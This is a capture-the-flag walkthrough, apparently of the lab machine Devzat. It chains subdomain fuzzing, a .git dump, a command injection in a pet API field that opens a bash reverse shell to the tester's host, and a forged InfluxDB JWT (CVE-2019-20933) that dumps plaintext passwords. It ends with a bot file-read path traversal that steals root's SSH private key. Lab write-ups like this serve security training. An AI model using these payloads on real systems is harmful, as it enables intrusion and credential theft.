nmap -p- --min-rate 5000 10.10.11.118 -Pn
After detection of open ports, let's do greater nmap scan here.
nmap -A -sC -sV -p22,80,8000 10.10.11.118 -Pn
From nmap scan result, I see that ip address is resolved into devzat.htb domain, that's why I add this into /etc/hosts file for resolving purposes.
Our web application is like below.
Let's do Subdomain Enumeration via wfuzz command.
wfuzz -u http://devzat.htb -H 'Host: FUZZ.devzat.htb' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hw 26
Let's add pets.devzat.htb domain into /etc/hosts file.
I looked at web application.
Let's do nmap scan for pets.devzat.htb application's port 80.
nmap -A -sC -sV -p80 pets.devzat.htb -Pn
I find .git directory, let's dump this via git-dumper.
python3 git_dumper.py http://pets.devzat.htb/.git/ /home/kali/Desktop/pets_devzat_htb/
Let's make Source Code analysis.
I looked at addPet function which I tested via adding cat previously on website, is vulnerable to Input Validation.
It means, that I can inject what value, I want here.
Let's turn on our owasp zap and start API pentesting.
Our POST request to API is like below.
Let's inject some payloads into species parameter. I add Directory Traversal payload into here.
I see result of my payload as below.
Let's inject reverse shell payload into here.
curl -X POST http://pets.devzat.htb/api/pet -d '{ "name": "dr4ks", "species": "cat; bash -c \"bash -i >& /dev/tcp/10.10.14.18/1337 0>&1\"" }' -H "'Content-Type': 'application/json'"
Hola, I got reverse shell from port 1337.
Let's make interactive shell.
python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo; fg
export TERM=xterm
export SHELL=bash
For Privilege Escalation vector, I just run netstat -ntpl to see open ports on victim machine.
Here, I see port 8086 is open and curl this port.
curl -v http://127.0.0.1:8086/
That's Influxdb and version is 1.7.5.
I found publicly knwon exploit for this version of Influxdb is that CVE-2019-20933.
It means we need to create JWT token by using username and exp fields via HS256 algorithm as below.
We can do this via Python shell.
import jwt
import time
jwt.encode({"exp": time.time()+10000, "username": "admin"}, "", algorithm="HS256")
Note: Don't forget change username field into admin value.
Let's use this JWT token while making request to Influxdb for Authorization HTTP request header as below.
curl -G localhost:8086/query?pretty=true --data-urlencode "q=SHOW DATABASES" -H "Authorization: Bearer {jwt}"
I just need to use devzat database and user table on here. We need to send query to this table to dump all user's data.
curl -G --data-urlencode "q=select * from \"user\"" -d "db=devzat" localhost:8086/query?pretty=true -H "Authorization: Bearer $token"
I dump usernames and their passwords as below.
wilhelm: WillyWonka2021
catherine: woBeeYareedahc7Oogeephies7Aiseci
charles: RoyalQueenBee$Let's check credentials of catherine user.
user.txt
On /var/backups folder, I find two .zip files and download both of them into my machine.
First, we need to open http.server.
python3 -m http.server --bind 10.10.11.118 1337
Second, we need to use wget command to download these files.
wget http://10.10.11.118:1337/devzat-main.zip
wget http://10.10.11.118:1337/devzat-dev.zip
I unzip the file called devzat-dev.zip and find a file called commands.go which have method called fileCommand() leak password.
Password: CeilingCatStillAThingIn2021?
From victim machine, we need to connect into 8443 port via ssh.
It is devbot.
Reminder! To work with devbot, you need to make stable connection, I mean it shouldn't be shell which you got from reverse shell. For that reason, add your public key into victim machine and connect into victim machine by using your private key via ssh command to get persistent shell.
ssh -p 8443 dr4ks@localhost
I look at commands for my user that can run or not.
Let's use /file option for this bot and use our leaked password.
root.txt
Let's take consistent shell, for this, we need to grab private key (id_rsa) file of root user.
/file ../.ssh/id_rsa CeilingCatStillAThingIn2021?
I got persistent shell, finally.
